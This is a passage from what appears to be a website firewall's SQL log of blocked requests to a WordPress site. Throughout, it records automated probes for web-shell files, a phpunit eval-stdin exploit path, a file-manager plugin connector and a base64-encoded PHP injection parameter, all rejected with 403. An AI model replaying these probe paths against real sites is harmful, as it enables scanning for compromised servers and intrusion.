ZMmjXuIUcR30A',0,1674016551.7372,205,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/classes.php','','{\"1\":\"python-requests\\/2.26.0\"}','pIqCF7NxE31tOBgHsvPZa5y2',0,1674016552.8324,179,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"python-requests\\/2.26.0\"}','0TRQgjsLz7KXAFYhwmiMvNbV',0,1674016553.8425,191,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','X46QcieVt0H7sq3jIlhSWOB2',0,1674019243.5883,215,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wp/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','q7cDxKy40uM68PeFwBQJEd3z',0,1674019244.4489,211,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/wordpress/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','0m3urdlyWexnZD7TfXvU4FGY',0,1674019245.2028,185,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/blog/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','j1ZbVKwcFiECfBYvUzqD8Why',0,1674019245.8940,178,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://dailyjolly.co.uk/site/wp-admin/css/colors/blue/blue.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','jUELSWGQHoZcvwkD8byNq7Cm',0,1674019246.8204,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','Jdp5UnkQA4E1WNyM3fReYsHi',0,1674023242.7312,243,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/xpwn.php','','{\"1\":\"python-requests\\/2.27.1\"}','j1xPokQR0Up76gtZvyb5Cwfe',0,1674023270.8076,728,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','L2mkoG6QvxzdZc8J9KbF1uj7',0,1674025238.8483,1070,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://dailyjolly.co.uk/wp-comments.php?pw=AsAjfkel!@&path=wp-test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/dailyjolly.co.uk\\/wp-comments.php?pw=AsAjfkel!@&path=wp-test\"}','QYMfoGreDnJqE2ky4WtiZcmS',0,1674040650.9521,272,'','GET',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nk4KC2rVBHScZAswQyl7EMog',0,1674051377.1238,326,'','POST',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.dailyjolly.co.uk/cjakvyki.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','H9wNWvJ17LArYbanZRKMjQx8',0,1674051377.5331,246,'','GET',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8w2KG7qS9Tbd6vPrhsaLlmnX',0,1674051385.8253,295,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','I0GFY5BbKp6m1Xw7ueZcy8af',0,1674057376.9245,361,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','J80HpfC4AEgBNUkmwS3sVdqj',0,1674057706.5797,224,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','PAm8j2URLwOi5DyWYQlXIvVf',0,1674057710.4320,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vqPpNGXWuBnocY3R86EeHkbr',0,1674057711.4380,207,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','6kIE4nUh70Opa8VjRSHZKbWw',0,1674057715.7207,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','KXIovbSm2Q85ualnJf7WF0z6',0,1674057716.1910,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','aSvOWCB8eDc7JT6knIxrspFK',0,1674057718.5029,215,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','H2oM7UROLGTc0zDPtpriujAe',0,1674057719.5416,193,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','YfatDCLswQXR9gAWhUNqFk1x',0,1674057720.0117,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','V5oiGHFfnPeSKlCQ2stIX6y0',0,1674057721.0128,204,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','W0kAI1pXlUTHiNtscBY8ZvF2',0,1674057722.1547,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','0B3Nv2poKYei7trMWkQmcCLj',0,1674057730.4608,242,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','favkhgLTwsMz4inNDUopdKAX',0,1674057734.7833,209,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','39oalLRxNvc8nA0grf7mkiPY',0,1674057735.8234,168,'','GET',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9sLzjnoxhtg3NOuESXBclWGF',0,1674058779.5612,1354,'','POST',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.dailyjolly.co.uk/xbzntepm.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3aPMs1uQZbnX9YFx4GBSpN08',0,1674058781.1879,377,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','K8ESWQ6s9ChjJax0wPuURitz',0,1674059090.6244,351,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','yzqCvEAVQnhZlHioewNM396k',0,1674059091.8910,271,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','VxK8NFuhe10SazfTq7grZvpk',0,1674059093.1087,248,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','K7TnjsXLI64faSDoMFHwGlcp',0,1674059094.2972,235,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','VrKWDLtRT1U8bJspyk9MihCo',0,1674059095.4404,256,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JcR1iCNyThEUMVuwm3lW9PzI',0,1674059096.6197,234,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','nuYA9wNxebc0GSJydjFgLIhP',0,1674059097.7742,231,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','s9tRNvByucY2l6CX8H1GfP3n',0,1674059098.9222,228,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4Rv1GPEINYBKwOreZVS6T98b',0,1674059100.0670,207,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OfQZYozPl26K3NaVWt9i5Xdp',0,1674059101.1900,188,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','G2bzpqwScluOZi6Ny9Ph7tAn',0,1674059102.3051,261,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NXzR0gGVvU5MtKWwHCyA3k1l',0,1674059103.4980,252,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','l6UXSYGZ497fvbOAiCxad2sF',0,1674059104.6638,202,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XTUcex6wkOZ8bHYuP4WRFIgd',0,1674059105.8101,220,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','32cGEUlJBuSq5CwrInsFZNiV',0,1674059106.9580,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OiWm9YTlzq4uQL832VEpKHhS',0,1674059108.0718,203,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','jHIqQT48KsrkFP103MbNlWeh',0,1674059109.2040,232,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Kilj6JrtdmfQaY8oN0XAVhkI',0,1674059110.3541,255,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Cl0qO1wEcg2pNs79rmHTk4iG',0,1674059111.5722,207,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Ij9YQXMqO8zdWUhaEKtv6bAD',0,1674059112.6968,256,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pVGOnxrf8qjIm52DdwzYPScZ',0,1674059113.9412,216,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','jAiVJBPIbRsHLlmTyWaYUwhp',0,1674059115.0744,297,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ACr2k7lGnOjBJfzXYqV8MWhE',0,1674059116.2828,243,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','5WSw4zTMEZ92yviYI0DJsbaO',0,1674059117.4434,322,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ixNfLIt8KrqAPmab3zeJu6dM',0,1674059118.6796,308,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','giTmNYb8skd0f2XpABz4yQeZ',0,1674059119.9029,280,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','B6pO8bncGCh3xP2QgiIZT7Mf',0,1674059121.1067,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','rEMb1cxR3iJpufHWBqKAN29e',0,1674059122.2319,270,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','35uCDiXMKSGspytq2rJIxh7e',0,1674059123.4387,495,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tZrKywIWTF3uac42PUfMXHEN',0,1674059124.8994,285,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tnuMaq4O7Tmz3cEsfZkwIWhC',0,1674059126.1253,356,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NPLlC9XuhsY3ftVyEaHki74O',0,1674059127.4299,280,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','whFqC0E4cd5ViZ73UReDyOu2',0,1674059128.6663,253,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UZtDajWCKHVJiGh2Tc5An3X9',0,1674059129.8453,264,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','C2Yzfe7Kk3619hxXnSWGMcsl',0,1674059131.0280,317,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Zv2CwNOdB7fjTLJYAM43VaD0',0,1674059132.2664,239,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','49rlNGxKLb1kXEBJHA867mYU',0,1674059133.4269,211,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Nx16vJbQfSpcu24lOMW8BrnF',0,1674059134.5549,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','LmUt9h6JFS0PeCk4f7bvgIda',0,1674059135.7194,226,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pbmFi8C3HaIhYkDnflEPgxcL',0,1674059136.8608,546,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Y1fWexkAwDdRFBsy8ovgTXUj',0,1674059138.3390,248,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OyvXHtR6JjDP5SLU2Fwdh4b3',0,1674059139.5229,266,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','eOpWqtbQmJEPagoDRC0j6FK2',0,1674059140.7090,246,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','lrWwx1zAig9oD8nqBLjkKYUQ',0,1674059141.8745,259,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','r9b80KDUy6mFZeWC3q1T4awn',0,1674059143.0621,257,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1uQNn0UOpv2lFLSxB7t5JhZC',0,1674059144.2929,456,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','BNcTESskR6vOh5Dxp7nCLeZd',0,1674059145.6776,258,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','s9ZOifaWjPoh1lGE2K0qMJmw',0,1674059146.9267,271,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Pqi6xBEQ4XVnt7N1vDcg9R25',0,1674059148.1344,238,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 